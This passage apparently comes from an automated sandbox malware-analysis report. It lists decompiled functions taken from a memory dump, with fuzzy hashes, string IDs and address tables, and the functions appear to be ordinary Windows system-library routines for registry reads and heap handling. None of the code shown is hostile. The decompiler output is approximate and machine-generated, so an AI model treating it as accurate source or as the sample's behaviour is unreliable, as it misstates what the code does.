                                      0x03790fa9
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: 479b8dba58ca2cea44a2202c09776823b2fb430bbd02bd30703c147f02a239fe
                                      • Instruction ID: 92f4c7f9ad78c7b7c160ce43a9fccdfde852e82f7356dad77fc3bdafeab6d589
                                      • Opcode Fuzzy Hash: 479b8dba58ca2cea44a2202c09776823b2fb430bbd02bd30703c147f02a239fe
                                      • Instruction Fuzzy Hash: 5151E3712043429FEB25DF29E884F1BB7E5EBC4304F040A2EF9968B290D771E905CB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E036FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E036E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03709830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03709990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E037095D0();
							goto L11;
						} else {
							_t109 = L036E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0370F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E037095D0();
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                      0x036ff0d3
                                      0x036ff0d9
                                      0x036ff0e0
                                      0x036ff0e7
                                      0x036ff0f2
                                      0x036ff0f4
                                      0x036ff0f8
                                      0x036ff100
                                      0x036ff108
                                      0x036ff10d
                                      0x036ff115
                                      0x036ff116
                                      0x036ff11f
                                      0x036ff123
                                      0x036ff124
                                      0x036ff12c
                                      0x036ff130
                                      0x036ff134
                                      0x036ff13d
                                      0x036ff144
                                      0x036ff14b
                                      0x036ff152
                                      0x0373bab0
                                      0x0373bab0
                                      0x036ff158
                                      0x036ff158
                                      0x036ff15a
                                      0x036ff160
                                      0x036ff165
                                      0x036ff166
                                      0x036ff16f
                                      0x036ff173
                                      0x0373baa7
                                      0x0373baa7
                                      0x0373baab
                                      0x00000000
                                      0x036ff179
                                      0x036ff18d
                                      0x036ff191
                                      0x0373baa2
                                      0x00000000
                                      0x036ff197
                                      0x036ff19b
                                      0x036ff1a2
                                      0x036ff1a9
                                      0x036ff1af
                                      0x036ff1b2
                                      0x036ff1b6
                                      0x036ff1b9
                                      0x036ff1c4
                                      0x036ff1d8
                                      0x036ff1df
                                      0x036ff1e3
                                      0x036ff1eb
                                      0x036ff1ee
                                      0x036ff1f4
                                      0x036ff20f
                                      0x0373bab7
                                      0x0373babb
                                      0x0373bacc
                                      0x0373bad1
                                      0x036ff215
                                      0x036ff218
                                      0x036ff226
                                      0x036ff22b
                                      0x00000000
                                      0x036ff22b
                                      0x036ff1f6
                                      0x036ff1f6
                                      0x036ff1f9
                                      0x036ff1fb
                                      0x036ff1fb
                                      0x036ff1f4
                                      0x036ff191
                                      0x036ff173
                                      0x036ff152
                                      0x036ff203

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction ID: 4631d2ccfc3fa814855057c466389fa66da59208f3d0e238aa20202ec27205a0
                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction Fuzzy Hash: 72518C75505710AFC321DF69C840A6BBBF8FF48710F00892EFA958B6A0E7B4E914CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03743540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E03743540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x37bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03700BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03743706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0370FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03743540;
						E0370FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0371DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03750C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E037097C0();
					}
					return E0370B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03743971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03743884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0370FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03709650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03743787(_a4,  &_v352, _t80);
						}
					}
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E037095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                      0x03743552
                                      0x0374355a
                                      0x0374355d
                                      0x03743566
                                      0x03743567
                                      0x0374357e
                                      0x0374358f
                                      0x037435a1
                                      0x037435a5
                                      0x0374366b
                                      0x0374366b
                                      0x0374366d
                                      0x03743672
                                      0x03743679
                                      0x03743685
                                      0x0374368d
                                      0x0374369d
                                      0x037436a7
                                      0x037436b8
                                      0x037436c6
                                      0x037436c7
                                      0x037436dc
                                      0x037436e1
                                      0x037436e7
                                      0x037436e9
                                      0x037436e9
                                      0x03743703
                                      0x03743703
                                      0x037435b5
                                      0x037435c0
                                      0x037435c4
                                      0x00000000
                                      0x00000000
                                      0x037435ca
                                      0x037435d7
                                      0x037435e2
                                      0x037435e6
                                      0x037435e8
                                      0x037435f5
                                      0x037435fa
                                      0x03743603
                                      0x03743604
                                      0x03743609
                                      0x0374360a
                                      0x03743612
                                      0x03743613
                                      0x0374361e
                                      0x03743622
                                      0x03743628
                                      0x0374362f
                                      0x0374362f
                                      0x03743636
                                      0x03743638
                                      0x0374363b
                                      0x03743642
                                      0x03743642
                                      0x03743636
                                      0x03743657
                                      0x03743657
                                      0x0374365c
                                      0x03743662
                                      0x03743669
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: BinaryHash
                                      • API String ID: 0-2202222882
                                      • Opcode ID: 961336a6fb61301a78120db84a24245a95b8953a619163ff89ebe3298f0c6567
                                      • Instruction ID: 1e1c0114d7ab77c99b336e46e95f3a8143650246d291eb88adaf5b14e51f1713
                                      • Opcode Fuzzy Hash: 961336a6fb61301a78120db84a24245a95b8953a619163ff89ebe3298f0c6567
                                      • Instruction Fuzzy Hash: D94146F5D0062D9BEB21DA50CC84FDEB77CAB44714F0045A5EA09AB280DB30AE988F95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037905AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 71%
                                      			E037905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E037907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03709730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0378A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0378A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03791293(_t79, _v40, E037907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E036E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0378138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                      0x037905c5
                                      0x037905ca
                                      0x037905d3
                                      0x037906db
                                      0x037906db
                                      0x037906dd
                                      0x037906e3
                                      0x037906e3
                                      0x037905dd
                                      0x037905e7
                                      0x037905f6
                                      0x03790600
                                      0x03790607
                                      0x03790610
                                      0x03790615
                                      0x0379061a
                                      0x0379061c
                                      0x0379061e
                                      0x03790624
                                      0x03790625
                                      0x03790627
                                      0x03790628
                                      0x03790631
                                      0x03790640
                                      0x0379064d
                                      0x03790654
                                      0x03790654
                                      0x03790631
                                      0x0379066d
                                      0x03790674
                                      0x00000000
                                      0x00000000
                                      0x03790692
                                      0x0379069e
                                      0x037906b0
                                      0x037906a0
                                      0x037906a9
                                      0x037906a9
                                      0x037906b8
                                      0x037906d6
                                      0x037906d6
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction ID: 88a6c6b96d823ffed1e8aeb031bcba054fdf144b360faa18b7f9e0de18c8347d
                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction Fuzzy Hash: 8331E032204305ABEB20DF24DD84F9AB7D9ABC4754F08422AFA58DB280D770E914CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03743884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E03743884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03709650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L036E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03709650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                      0x03743893
                                      0x03743896
                                      0x03743899
                                      0x0374389f
                                      0x037438a0
                                      0x037438a4
                                      0x037438a9
                                      0x037438ac
                                      0x037438ad
                                      0x037438ae
                                      0x037438af
                                      0x037438b1
                                      0x037438b4
                                      0x037438bb
                                      0x037438bc
                                      0x037438bd
                                      0x037438c4
                                      0x037438c8
                                      0x037438ca
                                      0x037438ca
                                      0x037438d5
                                      0x0374393e
                                      0x03743940
                                      0x03743942
                                      0x03743952
                                      0x03743954
                                      0x03743961
                                      0x03743961
                                      0x03743967
                                      0x0374396e
                                      0x0374396e
                                      0x03743947
                                      0x0374394c
                                      0x00000000
                                      0x0374394c
                                      0x037438ea
                                      0x037438ee
                                      0x037438f8
                                      0x037438f9
                                      0x037438ff
                                      0x03743900
                                      0x03743902
                                      0x03743903
                                      0x0374390b
                                      0x0374390f
                                      0x03743950
                                      0x00000000
                                      0x03743950
                                      0x03743915
                                      0x0374391d
                                      0x0374391d
                                      0x03743922
                                      0x03743926
                                      0x00000000
                                      0x03743928
                                      0x0374392b
                                      0x0374392b
                                      0x03743935
                                      0x03743937
                                      0x03743937
                                      0x00000000
                                      0x03743935
                                      0x03743926
                                      0x037438f0
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: BinaryName
                                      • API String ID: 0-215506332
                                      • Opcode ID: 9e9d0b987b18f40488bba7cddc7183e11af5e535209e1fe9cada2c6ed23cc7f9
                                      • Instruction ID: 417eab5658000e6817915aab77411df75ee52cab6ac14457510ecc2e71de4e6e
                                      • Opcode Fuzzy Hash: 9e9d0b987b18f40488bba7cddc7183e11af5e535209e1fe9cada2c6ed23cc7f9
                                      • Instruction Fuzzy Hash: 2031273AD01609BFFB15DA58C945E7FF778EB40724F054169E908AB290D730EE10D7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 33%
                                      			E036FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x37bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E036E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0370B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E037098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E037095D0();
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                      0x036fd29c
                                      0x036fd2a6
                                      0x036fd2b1
                                      0x036fd2b5
                                      0x036fd2b6
                                      0x036fd2bc
                                      0x036fd2bd
                                      0x036fd2be
                                      0x036fd2bf
                                      0x036fd2c2
                                      0x036fd2c4
                                      0x036fd2cc
                                      0x036fd384
                                      0x036fd34b
                                      0x036fd34f
                                      0x036fd350
                                      0x036fd351
                                      0x036fd35c
                                      0x036fd35c
                                      0x036fd2d6
                                      0x036fd2da
                                      0x036fd2e1
                                      0x036fd361
                                      0x036fd369
                                      0x036fd36d
                                      0x036fd2e3
                                      0x036fd2e3
                                      0x036fd2e3
                                      0x036fd2e5
                                      0x036fd2ed
                                      0x036fd2f5
                                      0x036fd2fa
                                      0x036fd302
                                      0x036fd303
                                      0x036fd30b
                                      0x036fd30f
                                      0x036fd313
                                      0x036fd318
                                      0x036fd31c
                                      0x036fd320
                                      0x036fd379
                                      0x036fd37d
                                      0x00000000
                                      0x00000000
                                      0x0373affe
                                      0x0373b001
                                      0x0373b011
                                      0x00000000
                                      0x036fd322
                                      0x036fd322
                                      0x036fd330
                                      0x036fd337
                                      0x036fd35d
                                      0x036fd339
                                      0x036fd33f
                                      0x036fd38c
                                      0x036fd38c
                                      0x036fd33f
                                      0x036fd349
                                      0x00000000
                                      0x036fd349

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 603aae4b6cffe82aa09384f4a8b6fc8bb1cd1046a082e381f0e7d7c0df8e92aa
                                      • Instruction ID: 6162aa3354840ed32baed95ed0dc29673a79321cf65b803f725e00b175655082
                                      • Opcode Fuzzy Hash: 603aae4b6cffe82aa09384f4a8b6fc8bb1cd1046a082e381f0e7d7c0df8e92aa
                                      • Instruction Fuzzy Hash: CB3191B6509305DFC721DF28C984A6BBBE8FB86654F04092EFB94C7250D635ED09CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036D1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E036D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0370BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0370A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0370A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L036E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                      0x036d1b8f
                                      0x036d1b9a
                                      0x036d1b9c
                                      0x036d1b9e
                                      0x036d1ba3
                                      0x03727010
                                      0x03727010
                                      0x00000000
                                      0x036d1ba9
                                      0x036d1ba9
                                      0x036d1bae
                                      0x00000000
                                      0x036d1bc5
                                      0x036d1bca
                                      0x036d1bcf
                                      0x036d1bd0
                                      0x036d1bd1
                                      0x036d1bd2
                                      0x036d1bd6
                                      0x036d1bdc
                                      0x036d1be0
                                      0x03726ffc
                                      0x03727000
                                      0x00000000
                                      0x03727006
                                      0x03727009
                                      0x03727009
                                      0x036d1be6
                                      0x036d1bec
                                      0x036d1c0b
                                      0x036d1c0b
                                      0x036d1c0c
                                      0x036d1c11
                                      0x036d1c12
                                      0x036d1c15
                                      0x036d1c1b
                                      0x036d1c1f
                                      0x036d1c31
                                      0x036d1c33
                                      0x03727026
                                      0x03727026
                                      0x036d1c21
                                      0x036d1c24
                                      0x036d1c24
                                      0x036d1bee
                                      0x036d1bee
                                      0x036d1bf2
                                      0x036d1c3a
                                      0x036d1bf4
                                      0x036d1bf4
                                      0x036d1c05
                                      0x036d1c05
                                      0x036d1c09
                                      0x036d1c3e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036d1c09
                                      0x036d1bec
                                      0x036d1be0
                                      0x036d1bae
                                      0x036d1c2e

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: WindowsExcludedProcs
                                      • API String ID: 0-3583428290
                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction ID: 2a1dc75a212a9847a9cbf326cfbf39dc399d7e053b10c9c068962b026a027a1c
                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction Fuzzy Hash: CA21D776A01228ABCB71DB55CA44F5BBBADEF43650F094465FD049B200D674DD05D7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036EF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                      0x036ef71d
